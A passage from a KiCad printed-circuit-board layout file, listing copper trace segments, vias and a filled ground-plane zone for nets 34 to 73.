(segment (start 141.425 76.45) (end 141.425 74.5) (width 0.381) (layer F.Cu) (net 34) (status 30))
(segment (start 19.015999 43.784001) (end 19.015999 38.584001) (width 0.254) (layer F.Cu) (net 35))
(segment (start 19.015999 38.584001) (end 21.35 36.25) (width 0.254) (layer F.Cu) (net 35) (status 20))
(segment (start 18 44.8) (end 19.015999 43.784001) (width 0.254) (layer F.Cu) (net 35) (status 10))
(segment (start 38.015999 26.584001) (end 40.35 24.25) (width 0.254) (layer F.Cu) (net 36) (status 20))
(segment (start 38.015999 31.784001) (end 38.015999 26.584001) (width 0.254) (layer F.Cu) (net 36))
(segment (start 37 32.8) (end 38.015999 31.784001) (width 0.254) (layer F.Cu) (net 36) (status 10))
(segment (start 57.015999 20.584001) (end 59.35 18.25) (width 0.254) (layer F.Cu) (net 37) (status 20))
(segment (start 57.015999 25.784001) (end 57.015999 20.584001) (width 0.254) (layer F.Cu) (net 37))
(segment (start 56 26.8) (end 57.015999 25.784001) (width 0.254) (layer F.Cu) (net 37) (status 10))
(segment (start 76.015999 26.084001) (end 78.35 23.75) (width 0.254) (layer F.Cu) (net 38) (status 20))
(segment (start 76.015999 31.284001) (end 76.015999 26.084001) (width 0.254) (layer F.Cu) (net 38))
(segment (start 75 32.3) (end 76.015999 31.284001) (width 0.254) (layer F.Cu) (net 38) (status 10))
(segment (start 149.015999 28.584001) (end 151.35 26.25) (width 0.254) (layer F.Cu) (net 39) (status 20))
(segment (start 149.015999 33.784001) (end 149.015999 28.584001) (width 0.254) (layer F.Cu) (net 39))
(segment (start 148 34.8) (end 149.015999 33.784001) (width 0.254) (layer F.Cu) (net 39) (status 10))
(segment (start 168.015999 26.084001) (end 170.35 23.75) (width 0.254) (layer F.Cu) (net 40) (status 20))
(segment (start 168.015999 31.284001) (end 168.015999 26.084001) (width 0.254) (layer F.Cu) (net 40))
(segment (start 167 32.3) (end 168.015999 31.284001) (width 0.254) (layer F.Cu) (net 40) (status 10))
(segment (start 187.015999 20.584001) (end 189.35 18.25) (width 0.254) (layer F.Cu) (net 41) (status 20))
(segment (start 187.015999 25.784001) (end 187.015999 20.584001) (width 0.254) (layer F.Cu) (net 41))
(segment (start 186 26.8) (end 187.015999 25.784001) (width 0.254) (layer F.Cu) (net 41) (status 10))
(segment (start 206.015999 26.584001) (end 208.35 24.25) (width 0.254) (layer F.Cu) (net 42) (status 20))
(segment (start 206.015999 31.784001) (end 206.015999 26.584001) (width 0.254) (layer F.Cu) (net 42))
(segment (start 205 32.8) (end 206.015999 31.784001) (width 0.254) (layer F.Cu) (net 42) (status 10))
(segment (start 225.015999 38.584001) (end 227.35 36.25) (width 0.254) (layer F.Cu) (net 43) (status 20))
(segment (start 225.015999 43.784001) (end 225.015999 38.584001) (width 0.254) (layer F.Cu) (net 43))
(segment (start 224 44.8) (end 225.015999 43.784001) (width 0.254) (layer F.Cu) (net 43) (status 10))
(segment (start 19.015999 57.584001) (end 21.35 55.25) (width 0.254) (layer F.Cu) (net 44) (status 20))
(segment (start 19.015999 62.784001) (end 19.015999 57.584001) (width 0.254) (layer F.Cu) (net 44))
(segment (start 18 63.8) (end 19.015999 62.784001) (width 0.254) (layer F.Cu) (net 44) (status 10))
(segment (start 38.015999 45.584001) (end 40.35 43.25) (width 0.254) (layer F.Cu) (net 45) (status 20))
(segment (start 38.015999 50.784001) (end 38.015999 45.584001) (width 0.254) (layer F.Cu) (net 45))
(segment (start 37 51.8) (end 38.015999 50.784001) (width 0.254) (layer F.Cu) (net 45) (status 10))
(segment (start 57.015999 39.584001) (end 59.35 37.25) (width 0.254) (layer F.Cu) (net 46) (status 20))
(segment (start 57.015999 44.784001) (end 57.015999 39.584001) (width 0.254) (layer F.Cu) (net 46))
(segment (start 56 45.8) (end 57.015999 44.784001) (width 0.254) (layer F.Cu) (net 46) (status 10))
(segment (start 76.015999 45.084001) (end 78.35 42.75) (width 0.254) (layer F.Cu) (net 47) (status 20))
(segment (start 76.015999 50.284001) (end 76.015999 45.084001) (width 0.254) (layer F.Cu) (net 47))
(segment (start 75 51.3) (end 76.015999 50.284001) (width 0.254) (layer F.Cu) (net 47) (status 10))
(segment (start 95.015999 47.584001) (end 97.35 45.25) (width 0.254) (layer F.Cu) (net 48) (status 20))
(segment (start 95.015999 52.784001) (end 95.015999 47.584001) (width 0.254) (layer F.Cu) (net 48))
(segment (start 94 53.8) (end 95.015999 52.784001) (width 0.254) (layer F.Cu) (net 48) (status 10))
(segment (start 149.015999 47.584001) (end 151.35 45.25) (width 0.254) (layer F.Cu) (net 49) (status 20))
(segment (start 149.015999 52.784001) (end 149.015999 47.584001) (width 0.254) (layer F.Cu) (net 49))
(segment (start 148 53.8) (end 149.015999 52.784001) (width 0.254) (layer F.Cu) (net 49) (status 10))
(segment (start 168.015999 45.084001) (end 170.35 42.75) (width 0.254) (layer F.Cu) (net 50) (status 20))
(segment (start 168.015999 50.284001) (end 168.015999 45.084001) (width 0.254) (layer F.Cu) (net 50))
(segment (start 167 51.3) (end 168.015999 50.284001) (width 0.254) (layer F.Cu) (net 50) (status 10))
(segment (start 187.015999 39.584001) (end 189.35 37.25) (width 0.254) (layer F.Cu) (net 51) (status 20))
(segment (start 187.015999 44.784001) (end 187.015999 39.584001) (width 0.254) (layer F.Cu) (net 51))
(segment (start 186 45.8) (end 187.015999 44.784001) (width 0.254) (layer F.Cu) (net 51) (status 10))
(segment (start 206.015999 45.584001) (end 208.35 43.25) (width 0.254) (layer F.Cu) (net 52) (status 20))
(segment (start 206.015999 50.784001) (end 206.015999 45.584001) (width 0.254) (layer F.Cu) (net 52))
(segment (start 205 51.8) (end 206.015999 50.784001) (width 0.254) (layer F.Cu) (net 52) (status 10))
(segment (start 225.015999 57.584001) (end 227.35 55.25) (width 0.254) (layer F.Cu) (net 53) (status 20))
(segment (start 225.015999 62.784001) (end 225.015999 57.584001) (width 0.254) (layer F.Cu) (net 53))
(segment (start 224 63.8) (end 225.015999 62.784001) (width 0.254) (layer F.Cu) (net 53) (status 10))
(segment (start 19.015999 76.584001) (end 21.35 74.25) (width 0.254) (layer F.Cu) (net 54) (status 20))
(segment (start 19.015999 81.784001) (end 19.015999 76.584001) (width 0.254) (layer F.Cu) (net 54))
(segment (start 18 82.8) (end 19.015999 81.784001) (width 0.254) (layer F.Cu) (net 54) (status 10))
(segment (start 38.015999 64.584001) (end 40.35 62.25) (width 0.254) (layer F.Cu) (net 55) (status 20))
(segment (start 38.015999 69.784001) (end 38.015999 64.584001) (width 0.254) (layer F.Cu) (net 55))
(segment (start 37 70.8) (end 38.015999 69.784001) (width 0.254) (layer F.Cu) (net 55) (status 10))
(segment (start 57.015999 58.584001) (end 59.35 56.25) (width 0.254) (layer F.Cu) (net 56) (status 20))
(segment (start 57.015999 63.784001) (end 57.015999 58.584001) (width 0.254) (layer F.Cu) (net 56))
(segment (start 56 64.8) (end 57.015999 63.784001) (width 0.254) (layer F.Cu) (net 56) (status 10))
(segment (start 76.015999 64.084001) (end 78.35 61.75) (width 0.254) (layer F.Cu) (net 57) (status 20))
(segment (start 76.015999 69.284001) (end 76.015999 64.084001) (width 0.254) (layer F.Cu) (net 57))
(segment (start 75 70.3) (end 76.015999 69.284001) (width 0.254) (layer F.Cu) (net 57) (status 10))
(segment (start 95.015999 66.584001) (end 97.35 64.25) (width 0.254) (layer F.Cu) (net 58) (status 20))
(segment (start 95.015999 71.784001) (end 95.015999 66.584001) (width 0.254) (layer F.Cu) (net 58))
(segment (start 94 72.8) (end 95.015999 71.784001) (width 0.254) (layer F.Cu) (net 58) (status 10))
(segment (start 149.015999 66.584001) (end 151.35 64.25) (width 0.254) (layer F.Cu) (net 59) (status 20))
(segment (start 149.015999 71.784001) (end 149.015999 66.584001) (width 0.254) (layer F.Cu) (net 59))
(segment (start 148 72.8) (end 149.015999 71.784001) (width 0.254) (layer F.Cu) (net 59) (status 10))
(segment (start 168.015999 64.084001) (end 170.35 61.75) (width 0.254) (layer F.Cu) (net 60) (status 20))
(segment (start 168.015999 69.284001) (end 168.015999 64.084001) (width 0.254) (layer F.Cu) (net 60))
(segment (start 167 70.3) (end 168.015999 69.284001) (width 0.254) (layer F.Cu) (net 60) (status 10))
(segment (start 187.015999 58.584001) (end 189.35 56.25) (width 0.254) (layer F.Cu) (net 61) (status 20))
(segment (start 187.015999 63.784001) (end 187.015999 58.584001) (width 0.254) (layer F.Cu) (net 61))
(segment (start 186 64.8) (end 187.015999 63.784001) (width 0.254) (layer F.Cu) (net 61) (status 10))
(segment (start 206.015999 64.584001) (end 208.35 62.25) (width 0.254) (layer F.Cu) (net 62) (status 20))
(segment (start 206.015999 69.784001) (end 206.015999 64.584001) (width 0.254) (layer F.Cu) (net 62))
(segment (start 205 70.8) (end 206.015999 69.784001) (width 0.254) (layer F.Cu) (net 62) (status 10))
(segment (start 225.015999 81.784001) (end 225.015999 76.584001) (width 0.254) (layer F.Cu) (net 63))
(segment (start 225.015999 76.584001) (end 227.35 74.25) (width 0.254) (layer F.Cu) (net 63) (status 20))
(segment (start 224 82.8) (end 225.015999 81.784001) (width 0.254) (layer F.Cu) (net 63) (status 10))
(segment (start 88.606222 84.957059) (end 88.606222 82.972949) (width 0.254) (layer F.Cu) (net 64) (status 20))
(segment (start 83.186858 90.376423) (end 88.606222 84.957059) (width 0.254) (layer F.Cu) (net 64) (status 10))
(segment (start 109.48577 90.075) (end 110.871058 90.075) (width 0.254) (layer F.Cu) (net 65) (status 20))
(segment (start 103.769873 95.790897) (end 109.48577 90.075) (width 0.254) (layer F.Cu) (net 65) (status 10))
(segment (start 138.610288 99.831312) (end 139.569873 100.790897) (width 0.254) (layer F.Cu) (net 66) (status 20))
(segment (start 138.610288 92.16423) (end 138.610288 99.831312) (width 0.254) (layer F.Cu) (net 66) (status 10))
(segment (start 138.171058 91.725) (end 138.610288 92.16423) (width 0.254) (layer F.Cu) (net 66) (status 30))
(segment (start 159.153883 84.87939) (end 160.156222 83.877051) (width 0.254) (layer F.Cu) (net 67) (status 20))
(segment (start 159.153883 92.964613) (end 159.153883 84.87939) (width 0.254) (layer F.Cu) (net 67) (status 10))
(segment (start 95.015999 33.784001) (end 95.015999 28.584001) (width 0.254) (layer F.Cu) (net 68))
(segment (start 95.015999 28.584001) (end 97.35 26.25) (width 0.254) (layer F.Cu) (net 68) (status 20))
(segment (start 94 34.8) (end 95.015999 33.784001) (width 0.254) (layer F.Cu) (net 68) (status 10))
(segment (start 53.65 79.295) (end 53.475 79.12) (width 0.254) (layer F.Cu) (net 69) (status 30))
(segment (start 53.65 81.85) (end 53.65 79.295) (width 0.254) (layer F.Cu) (net 69) (status 30))
(segment (start 58.8 83.2) (end 57.796 83.2) (width 0.254) (layer F.Cu) (net 69) (status 10))
(segment (start 56.560979 82.089748) (end 57.671231 83.2) (width 0.254) (layer F.Cu) (net 69))
(segment (start 57.671231 83.2) (end 58.8 83.2) (width 0.254) (layer F.Cu) (net 69) (status 20))
(segment (start 56.560979 81.172377) (end 56.560979 82.089748) (width 0.254) (layer F.Cu) (net 69))
(segment (start 54.488399 80.822999) (end 56.211601 80.822999) (width 0.254) (layer F.Cu) (net 69))
(segment (start 56.211601 80.822999) (end 56.560979 81.172377) (width 0.254) (layer F.Cu) (net 69))
(segment (start 53.65 81.661398) (end 54.488399 80.822999) (width 0.254) (layer F.Cu) (net 69) (status 10))
(segment (start 53.65 81.85) (end 53.65 81.661398) (width 0.254) (layer F.Cu) (net 69) (status 30))
(segment (start 97.86744 77.222998) (end 100.625463 79.98102) (width 0.254) (layer F.Cu) (net 70))
(segment (start 66.973001 77.222999) (end 97.86744 77.222998) (width 0.254) (layer F.Cu) (net 70))
(segment (start 66.9 77.296) (end 66.973001 77.222999) (width 0.254) (layer F.Cu) (net 70))
(segment (start 66.9 78.3) (end 66.9 77.296) (width 0.254) (layer F.Cu) (net 70))
(segment (start 111.792916 79.98102) (end 112.376968 79.396968) (width 0.254) (layer F.Cu) (net 70))
(segment (start 112.376968 79.396968) (end 111.792915 79.98102) (width 0.254) (layer F.Cu) (net 70))
(segment (start 113.55401 78.219925) (end 113.560075 78.219925) (width 0.254) (layer F.Cu) (net 70))
(segment (start 112.831967 78.941967) (end 113.55401 78.219925) (width 0.254) (layer F.Cu) (net 70))
(segment (start 112.831967 78.941967) (end 112.376968 79.396968) (width 0.254) (layer F.Cu) (net 70))
(segment (start 115.53 76.25) (end 115.53 76.025) (width 0.254) (layer F.Cu) (net 70))
(segment (start 111.792915 79.981019) (end 114.993934 76.78) (width 0.254) (layer F.Cu) (net 70))
(segment (start 114.993934 76.78) (end 115 76.78) (width 0.254) (layer F.Cu) (net 70))
(segment (start 111.61898 79.98102) (end 111.792915 79.981019) (width 0.254) (layer F.Cu) (net 70))
(segment (start 115 76.78) (end 115.53 76.25) (width 0.254) (layer F.Cu) (net 70))
(segment (start 113.560075 78.219925) (end 115 76.78) (width 0.254) (layer F.Cu) (net 70))
(segment (start 100.625463 79.98102) (end 111.61898 79.98102) (width 0.254) (layer F.Cu) (net 70))
(segment (start 111.61898 79.98102) (end 111.792916 79.98102) (width 0.254) (layer F.Cu) (net 70))
(segment (start 113.1 78.031868) (end 113.1 76.025) (width 0.254) (layer F.Cu) (net 71) (status 20))
(segment (start 66.627011 76.768989) (end 98.055499 76.768989) (width 0.254) (layer F.Cu) (net 71))
(segment (start 66.1 77.296) (end 66.627011 76.768989) (width 0.254) (layer F.Cu) (net 71))
(segment (start 66.1 78.3) (end 66.1 77.296) (width 0.254) (layer F.Cu) (net 71) (status 10))
(segment (start 100.81352 79.52701) (end 99.893255 78.606745) (width 0.254) (layer F.Cu) (net 71))
(segment (start 111.604858 79.52701) (end 100.81352 79.52701) (width 0.254) (layer F.Cu) (net 71))
(segment (start 112.350934 78.780934) (end 111.604858 79.52701) (width 0.254) (layer F.Cu) (net 71))
(segment (start 98.055499 76.768989) (end 99.893255 78.606745) (width 0.254) (layer F.Cu) (net 71))
(segment (start 111.830934 79.300934) (end 112.350934 78.780934) (width 0.254) (layer F.Cu) (net 71))
(segment (start 112.350934 78.780934) (end 113.1 78.031868) (width 0.254) (layer F.Cu) (net 71))
(segment (start 140.44 70.585) (end 141.32 70.585) (width 0.254) (layer F.Cu) (net 72) (status 30))
(segment (start 135.275 75.75) (end 140.44 70.585) (width 0.254) (layer F.Cu) (net 72) (status 30))
(segment (start 135.275 76.45) (end 135.275 75.75) (width 0.254) (layer F.Cu) (net 72) (status 30))
(segment (start 73.165 80.8) (end 73.185 80.78) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC3AA) (status 30))
(segment (start 64.5 73.045) (end 64.5 73.371938) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC31D) (status 30))
(segment (start 53.64 86.805) (end 53.605 86.84) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC230) (status 30))
(segment (start 53.605 89.36) (end 53.635 89.39) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC1A3) (status 30))
(segment (start 64.5 73.045) (end 62.05 73.045) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC356) (status 30))
(segment (start 64.505 73.04) (end 64.5 73.045) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC1D0) (status 30))
(segment (start 70.25 87.25) (end 70.2 87.2) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC2B7) (status 30))
(segment (start 53.465 75.92) (end 53.545 76) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC2C3) (status 30))
(segment (start 70.22 80.78) (end 70.2 80.8) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC28D) (status 30))
(segment (start 73.185 80.78) (end 70.22 80.78) (width 0.381) (layer F.Cu) (net 73) (tstamp 5EDCC2BD) (status 30))
(segment (start 53.545 75.755) (end 53.2805 75.4905) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 53.545 76) (end 53.545 75.755) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 70.2 87.2) (end 71.425 87.2) (width 0.381) (layer F.Cu) (net 73) (status 10))
(segment (start 72.575 87.2) (end 72.975 86.8) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 70.2 87.2) (end 72.575 87.2) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 55.35 82.152902) (end 55.35 81.85) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 53.65 83.852902) (end 55.35 82.152902) (width 0.254) (layer F.Cu) (net 73) (status 30))
(segment (start 53.65 84.05) (end 53.65 83.852902) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 55.465 79.12) (end 55.525 79.12) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 53.65 86.665) (end 53.475 86.84) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 73.720501 88.665501) (end 74.925 89.87) (width 0.381) (layer F.Cu) (net 73) (status 20))
(segment (start 69.137599 88.665501) (end 73.720501 88.665501) (width 0.381) (layer F.Cu) (net 73))
(segment (start 112.29 60.05) (end 112.375 59.965) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 65.3 79.41) (end 65.3 78.3) (width 0.254) (layer F.Cu) (net 73) (status 20))
(segment (start 62.31 82.4) (end 65.3 79.41) (width 0.254) (layer F.Cu) (net 73))
(segment (start 58.8 82.4) (end 62.31 82.4) (width 0.254) (layer F.Cu) (net 73) (status 10))
(segment (start 69.059499 88.587401) (end 69.059499 87.526899) (width 0.254) (layer F.Cu) (net 73))
(segment (start 69.386398 87.2) (end 70.2 87.2) (width 0.254) (layer F.Cu) (net 73) (status 20))
(segment (start 69.059499 87.526899) (end 69.386398 87.2) (width 0.254) (layer F.Cu) (net 73))
(segment (start 66.796 80.8) (end 65.3 79.304) (width 0.254) (layer F.Cu) (net 73))
(segment (start 70.2 80.8) (end 66.796 80.8) (width 0.254) (layer F.Cu) (net 73) (status 10))
(segment (start 62.204 82.4) (end 58.8 82.4) (width 0.254) (layer F.Cu) (net 73) (status 20))
(segment (start 65.3 79.304) (end 62.204 82.4) (width 0.254) (layer F.Cu) (net 73))
(segment (start 65.3 78.3) (end 65.3 79.304) (width 0.254) (layer F.Cu) (net 73) (status 10))
(segment (start 113.445 67.78) (end 113.225 68) (width 0.254) (layer F.Cu) (net 73) (status 30))
(segment (start 113.225 65.28) (end 113.445 65.06) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 113.29 65.06) (end 112.375 64.145) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 113.445 65.06) (end 113.29 65.06) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 112.375 64.145) (end 112.375 59.965) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 112.375 59.965) (end 121.015 59.965) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 121.015 59.965) (end 121.015 64.145) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 120.86 64.145) (end 119.945 65.06) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 121.015 64.145) (end 120.86 64.145) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 113.445 67.53) (end 112.975 68) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 113.445 65.06) (end 113.445 67.53) (width 0.381) (layer F.Cu) (net 73) (status 30))
(segment (start 120.525 65.64) (end 120.525 68) (width 0.381) (layer F.Cu) (net 73) (status 20))
(segment (start 119.945 65.06) (end 120.525 65.64) (width 0.381) (layer F.Cu) (net 73) (status 10))
(segment (start 110.7 65.82) (end 112.375 64.145) (width 0.381) (layer F.Cu) (net 73) (status 20))
(segment (start 110.7 78.4) (end 110.7 65.82) (width 0.381) (layer F.Cu) (net 73) (status 10))
(segment (start 58.772098 89.7) (end 60.5 89.7) (width 0.381) (layer F.Cu) (net 73) (status 20))
(segment (start 57.371588 88.29949) (end 58.772098 89.7) (width 0.381) (layer F.Cu) (net 73))
(segment (start 54.56551 88.29949) (end 57.371588 88.29949) (width 0.381) (layer F.Cu) (net 73))
(segment (start 53.475 89.39) (end 54.56551 88.29949) (width 0.381) (layer F.Cu) (net 73) (status 10))
(segment (start 69.069 87.2) (end 70.2 87.2) (width 0.381) (layer F.Cu) (net 73) (status 20))
(segment (start 69.059499 87.190499) (end 69.069 87.2) (width 0.381) (layer F.Cu) (net 73))
(segment (start 69.059499 80.809501) (end 69.059499 87.190499) (width 0.381) (layer F.Cu) (net 73))
(segment (start 69.069 80.8) (end 69.059499 80.809501) (width 0.381) (layer F.Cu) (net 73))
(segment (start 70.2 80.8) (end 69.069 80.8) (width 0.381) (layer F.Cu) (net 73) (status 10))
(segment (start 65.3 77.169) (end 66.217521 76.251479) (width 0.381) (layer F.Cu) (net 73))
(segment (start 65.3 78.3) (end 65.3 77.169) (width 0.381) (layer F.Cu) (net 73) (status 10))
(segment (start 66.217521 74.762521) (end 66.217521 76.251479) (width 0.381) (layer F.Cu) (net 73))
(segment (start 64.5 73.045) (end 66.217521 74.762521) (width 0.381) (layer F.Cu) (net 73) (status 10))
(segment (start 110.6 79.0095) (end 110.6 78.5) (width 0.381) (layer F.Cu) (net 73))
(segment (start 110.6 78.5) (end 110.7 78.4) (width 0.381) (layer F.Cu) (net 73))
(segment (start 101.027878 79.0095) (end 110.6 79.0095) (width 0.381) (layer F.Cu) (net 73))
(segment (start 98.269857 76.251479) (end 101.027878 79.0095) (width 0.381) (layer F.Cu) (net 73))
(segment (start 66.217521 76.251479) (end 98.269857 76.251479) (width 0.381) (layer F.Cu) (net 73))
(segment (start 46.19 89.39) (end 42 85.2) (width 0.381) (layer F.Cu) (net 73))
(segment (start 53.475 89.39) (end 46.19 89.39) (width 0.381) (layer F.Cu) (net 73))
(segment (start 51.2 76) (end 42 85.2) (width 0.381) (layer F.Cu) (net 73))
(segment (start 53.545 76) (end 51.2 76) (width 0.381) (layer F.Cu) (net 73))
(segment (start 57.078489 80.673489) (end 55.525 79.12) (width 0.381) (layer F.Cu) (net 73))
(segment (start 57.078489 81.831161) (end 57.078489 80.673489) (width 0.381) (layer F.Cu) (net 73))
(segment (start 57.647328 82.4) (end 57.078489 81.831161) (width 0.381) (layer F.Cu) (net 73))
(segment (start 58.8 82.4) (end 57.647328 82.4) (width 0.381) (layer F.Cu) (net 73))
(via (at 56.868999 79.12) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 73))
(segment (start 55.525 79.12) (end 56.868999 79.12) (width 0.381) (layer F.Cu) (net 73))
(segment (start 56.868999 79.12) (end 54.57 79.12) (width 0.381) (layer B.Cu) (net 73))
(via (at 56.84 86.76) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 73))
(segment (start 56.868999 86.731001) (end 56.84 86.76) (width 0.381) (layer B.Cu) (net 73))
(segment (start 56.868999 79.12) (end 56.868999 86.731001) (width 0.381) (layer B.Cu) (net 73))
(segment (start 53.475 86.84) (end 53.475 85.345) (width 0.381) (layer F.Cu) (net 73))
(via (at 56.655548 83.212451) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 73))
(segment (start 55.35 81.906903) (end 56.655548 83.212451) (width 0.381) (layer F.Cu) (net 73))
(segment (start 55.35 81.85) (end 55.35 81.906903) (width 0.381) (layer F.Cu) (net 73))
(via (at 52.19 84.03) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 73))
(segment (start 52.21 84.05) (end 52.19 84.03) (width 0.381) (layer F.Cu) (net 73))
(segment (start 53.65 84.05) (end 52.21 84.05) (width 0.381) (layer F.Cu) (net 73))
(segment (start 53.007549 83.212451) (end 56.655548 83.212451) (width 0.381) (layer B.Cu) (net 73))
(segment (start 52.19 84.03) (end 53.007549 83.212451) (width 0.381) (layer B.Cu) (net 73))
(segment (start 68.511597 86.439499) (end 69.272098 87.2) (width 0.381) (layer F.Cu) (net 73))
(segment (start 62.629501 86.439499) (end 68.511597 86.439499) (width 0.381) (layer F.Cu) (net 73))
(segment (start 69.272098 87.2) (end 70.2 87.2) (width 0.381) (layer F.Cu) (net 73))
(segment (start 60.5 88.569) (end 62.629501 86.439499) (width 0.381) (layer F.Cu) (net 73))
(segment (start 60.5 89.7) (end 60.5 88.569) (width 0.381) (layer F.Cu) (net 73))
(zone (net 73) (net_name GND) (layer F.Cu) (tstamp 5EE14219) (hatch edge 0.508)
(connect_pads (clearance 0.508))
(min_thickness 0.254)
(fill yes (arc_segments 32) (thermal_gap 0.508) (thermal_bridge_width 0.508))
(polygon
(pts
(xy 69.61 89.09) (xy 59.39 89.1) (xy 59.4 78.9) (xy 69.6 78.9)
)
)
(filled_polygon
(pts
(xy 62.692696 86.399843) (xy 62.523178 86.513111) (xy 62.379015 86.657274) (xy 62.265747 86.826792) (xy 62.187726 87.01515)
(xy 62.147952 87.215109) (xy 62.147952 87.298837) (xy 62.118102 87.304774) (xy 61.929744 87.382795) (xy 61.760226 87.496063)
(xy 61.616063 87.640226) (xy 61.502795 87.809744) (xy 61.424774 87.998102) (xy 61.385 88.198061) (xy 61.385 88.311928)
(xy 61.025 88.311928) (xy 60.900518 88.324188) (xy 60.899337 88.324546) (xy 60.78575 88.315) (xy 60.693667 88.407083)
(xy 60.670506 88.419463) (xy 60.573815 88.498815) (xy 60.494463 88.595506) (xy 60.435498 88.70582) (xy 60.399188 88.825518)
(xy 60.386928 88.95) (xy 60.386928 88.972024) (xy 60.373 88.972038) (xy 60.373 88.47375) (xy 60.21425 88.315)
(xy 60.183881 88.317552) (xy 60.188072 88.275) (xy 60.188072 87.725) (xy 60.175812 87.600518) (xy 60.175655 87.6)
(xy 60.175812 87.599482) (xy 60.188072 87.475) (xy 60.188072 86.925) (xy 60.175812 86.800518) (xy 60.175655 86.8)
(xy 60.175812 86.799482) (xy 60.188072 86.675) (xy 60.188072 86.362) (xy 62.784056 86.362)
)
)
(filled_polygon
(pts
(xy 65.373815 79.501185) (xy 65.470506 79.580537) (xy 65.493667 79.592917) (xy 65.58575 79.685) (xy 65.699337 79.675454)
(xy 65.700518 79.675812) (xy 65.825 79.688072) (xy 66.375 79.688072) (xy 66.499482 79.675812) (xy 66.5 79.675655)
(xy 66.500518 79.675812) (xy 66.625 79.688072) (xy 67.009942 79.688072) (xy 67.010301 79.688744) (xy 67.040056 79.725)
(xy 67.113459 79.814443) (xy 67.144966 79.8403) (xy 67.300201 79.995535) (xy 67.326058 80.027042) (xy 67.451757 80.1302)
(xy 67.595165 80.206854) (xy 67.750773 80.254057) (xy 67.872046 80.266001) (xy 67.872055 80.266001) (xy 67.912598 80.269994)
(xy 67.953141 80.266001) (xy 68.811928 80.266001) (xy 68.811928 80.275) (xy 68.824188 80.399482) (xy 68.824546 80.400663)
(xy 68.815 80.51425) (xy 68.907083 80.606333) (xy 68.919463 80.629494) (xy 68.998815 80.726185) (xy 69.088759 80.8)
(xy 68.998815 80.873815) (xy 68.919463 80.970506) (xy 68.907083 80.993667) (xy 68.815 81.08575) (xy 68.824546 81.199337)
(xy 68.824188 81.200518) (xy 68.811928 81.325) (xy 68.811928 81.875) (xy 68.824188 81.999482) (xy 68.824345 82)
(xy 68.824188 82.000518) (xy 68.811928 82.125) (xy 68.811928 82.675) (xy 68.824188 82.799482) (xy 68.824345 82.8)
(xy 68.824188 82.800518) (xy 68.811928 82.925) (xy 68.811928 83.475) (xy 68.824188 83.599482) (xy 68.824345 83.6)
(xy 68.824188 83.600518) (xy 68.811928 83.725) (xy 68.811928 84.275) (xy 68.824188 84.399482) (xy 68.824345 84.4)
(xy 68.824188 84.400518) (xy 68.811928 84.525) (xy 68.811928 85.075) (xy 68.824188 85.199482) (xy 68.824345 85.2)
(xy 68.824188 85.200518) (xy 68.811928 85.325) (xy 68.811928 85.875) (xy 68.824188 85.999482) (xy 68.824345 86)
(xy 68.824188 86.000518) (xy 68.811928 86.125) (xy 68.811928 86.675) (xy 68.824188 86.799482) (xy 68.824546 86.800663)
(xy 68.815 86.91425) (xy 68.907083 87.006333) (xy 68.919463 87.029494) (xy 68.998815 87.126185) (xy 69.088759 87.2)
(xy 68.998815 87.273815) (xy 68.919463 87.370506) (xy 68.907083 87.393667) (xy 68.815 87.48575) (xy 68.824546 87.599337)
(xy 68.824188 87.600518) (xy 68.811928 87.725) (xy 68.811928 88.275) (xy 68.815962 88.315962) (xy 68.775 88.311928)
(xy 68.225 88.311928) (xy 68.100518 88.324188) (xy 68.1 88.324345) (xy 68.099482 88.324188) (xy 67.975 88.311928)
(xy 67.451908 88.311928) (xy 67.451908 88.244183) (xy 67.412134 88.044224) (xy 67.334113 87.855866) (xy 67.220845 87.686348)
(xy 67.076682 87.542185) (xy 66.907164 87.428917) (xy 66.718806 87.350896) (xy 66.518847 87.311122) (xy 66.425 87.311122)
(xy 66.425 87.128061) (xy 66.385226 86.928102) (xy 66.307205 86.739744) (xy 66.193937 86.570226) (xy 66.049774 86.426063)
(xy 65.880256 86.312795) (xy 65.691898 86.234774) (xy 65.491939 86.195) (xy 65.288061 86.195) (xy 65.088102 86.234774)
(xy 64.899744 86.312795) (xy 64.730226 86.426063) (xy 64.586063 86.570226) (xy 64.472795 86.739744) (xy 64.394774 86.928102)
(xy 64.355 87.128061) (xy 64.355 87.269301) (xy 64.316719 87.269301) (xy 64.217952 87.288947) (xy 64.217952 87.215109)
(xy 64.178178 87.01515) (xy 64.100157 86.826792) (xy 63.986889 86.657274) (xy 63.91105 86.581435) (xy 64.090256 86.507205)
(xy 64.259774 86.393937) (xy 64.403937 86.249774) (xy 64.517205 86.080256) (xy 64.595226 85.891898) (xy 64.635 85.691939)
(xy 64.635 85.488061) (xy 64.595226 85.288102) (xy 64.517205 85.099744) (xy 64.403937 84.930226) (xy 64.259774 84.786063)
